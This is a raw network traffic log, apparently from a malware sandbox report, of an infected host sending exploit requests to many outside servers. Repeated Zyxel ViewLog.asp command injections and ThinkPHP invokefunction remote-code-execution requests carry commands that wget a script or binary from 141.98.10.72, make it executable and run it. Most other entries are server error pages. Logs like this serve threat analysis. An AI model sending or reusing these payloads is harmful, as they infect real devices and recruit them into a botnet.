                                                      Feb 14, 2024 09:29:30.799308062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      273192.168.2.155527031.196.74.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:31.488595963 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      274192.168.2.155812494.121.149.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:31.738348961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      275192.168.2.153648088.12.95.4580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:31.793267012 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:32.015520096 CET671INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                      Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19de


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      276192.168.2.153375888.99.29.24980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:32.010329008 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:32.218229055 CET323INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:44 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      277192.168.2.153648688.12.95.4580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:32.238091946 CET489INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20
                                                      Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.19 19dec2003Date: Wed, 14 Feb 2024 09:31:38 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BOD


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      278192.168.2.154150295.128.129.6180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.421569109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.620564938 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:28 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      279192.168.2.155037895.111.232.9380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.432164907 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.642358065 CET513INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:33 GMT
                                                      Server: Apache/2.4.29 (Ubuntu)
                                                      Content-Length: 319
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 69 34 37 32 38 34 39 2e 63 6f 6e 74 61 62 6f 73 65 72 76 65 72 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at vmi472849.contaboserver.net Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      280192.168.2.153619495.168.249.2680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.449356079 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.675309896 CET113INHTTP/1.1 400 Bad Request
                                                      Connection: close
                                                      Content-Type: text/plain
                                                      Transfer-Encoding: chunked
                                                      Feb 14, 2024 09:29:33.676153898 CET33INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: BBad Request0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      281192.168.2.154848495.56.57.21080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.513112068 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.804459095 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:29:33.805387974 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      282192.168.2.155860888.99.179.5680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.638348103 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.844690084 CET1286INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 1982
                                                      Connection: close
                                                      ETag: "52bb30b4-7be"
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 43 41 4d 53 43 41 50 45 20 53 45 52 56 49 43 45 53 20 53 52 4c 22 20 2f 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 62 6f 64 79 20 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 3b 66 6f 6e 74 3a 6e 6f 72 6d 61 6c 20 31 36 70 78 20 41 72 69 61 6c 7d 0a 09 09 64 69 76 23 70 6f 70 75 70 20 7b 6d 61 72 67 69 6e 3a 31 30 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 30 70 78 3b 20 77 69 64 74 68 3a 34 30 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 7d 0a 09 09 69 6d 67 23 6c 6f 67 6f 20 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 7d 0a 09 09 61 2e 63 61 6d 73 63 61 70 65 2c 61 2e 63 2d 68 6f 73 74 69 6e 67 2c 61 2e 63 2d 73 6f 66 74 77 61 72 65 2c 61 2e 63 2d 61 64 6d 69 6e 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 0a 09 09 61 2e 63 61 6d 73 63 61 70 65 7b 63 6f 6c 6f 72 3a 23 32 31 39 31 42 36 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 09 09 61 2e 63 2d 68 6f 73 74 69 6e 67 7b 63 6f 6c 6f 72 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 09 61 2e 63 2d 73 6f 66 74 77 61 72 65 7b 63 6f 6c 6f 72 3a 62 6c 75 65 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 09 61 2e 63 2d 61 64 6d 69 6e 7b 63 6f 6c 6f 72 3a 67 72 65 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 09 64 69 76 2e 63 2d 6c 69 6e 6b 73 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 73 6d 61 6c 6c 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 09 09 64 69 76 2e 6c 65 66 74 20 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 73 6d 61 6c 6c 3b 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 70 6f 70 75 70 22 3e 0a 09 09 3c 68 32 3e 34 30 30 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 2e 3c 2f 68 32 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 0a 09 09 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 20 63 61 6e 6e 6f 74 20 62 65 20 75 6e 64 65 72 73 74 6f 6f 64 20 62 79 20 74 68 65 20 73 65 72 76 65 72 2c 20 70 72 6f 62 61 62 6c 79 20 64 75 65 20 74 6f 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 73 79 6e 74 61 78 2e 20 44 6f 20 6e 6f 74 20 74 72 79 20 69 74 20 61 67 61 69 6e 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 62 79 20 76 69 73 69
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>400</title><meta name="author" content="CAMSCAPE SERVICES SRL" /><style type="text/css">body {text-align:center;background:red;font:normal 16px Arial}div#popup {margin:100px auto;text-align:left;border:0px; width:400px; padding:20px;background:white;}img#logo {width:360px;}a.camscape,a.c-hosting,a.c-software,a.c-admin {text-decoration:none;}a.camscape{color:#2191B6!important;font-weight:bold;}a.c-hosting{color:red!important;}a.c-software{color:blue!important;}a.c-admin{color:green!important;}div.c-links {font-weight:normal;font-size:x-small;text-align:left;font-family:Arial,sans-serif;}div.left {text-align:left;font-size:small;}</style> </head> <body><div id="popup"><h2>400: The request could not be processed.</h2><div class="left"> The request cannot be understood by the server, probably due to a malformed syntax. Do not try it again, you may find what you are looking for by visi
                                                      Feb 14, 2024 09:29:33.844702959 CET873INData Raw: 74 69 6e 67 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 68 6f 6d 65 20 70 61 67 65 3c 2f 61 3e 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 62 72 2f 3e 0a 09 09 3c 62 72 2f 3e 0a 09 09 3c 68 32 3e 34 30 30 3a 20
                                                      Data Ascii: ting the website's <a href="/">home page</a>.</div><br/><br/><h2>400: Ati trimis o cerere ce nu poate fi procesata.</h2><div class="left"> Cererea nu poate fi inteleasa de catre server, probabil datorita unei sintaxe gresi


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      283192.168.2.155926288.218.158.21380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.661618948 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.878215075 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Sun, 11 Aug 2019 04:08:54 GMT
                                                      Server: lighttpd/1.4.39
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                      Feb 14, 2024 09:29:34.073343992 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Sun, 11 Aug 2019 04:08:54 GMT
                                                      Server: lighttpd/1.4.39
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      284192.168.2.155587688.221.47.14580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:33.666095972 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.883097887 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:33 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:33 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 33 26 23 34 36 3b 32 63 31 37 66 38 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
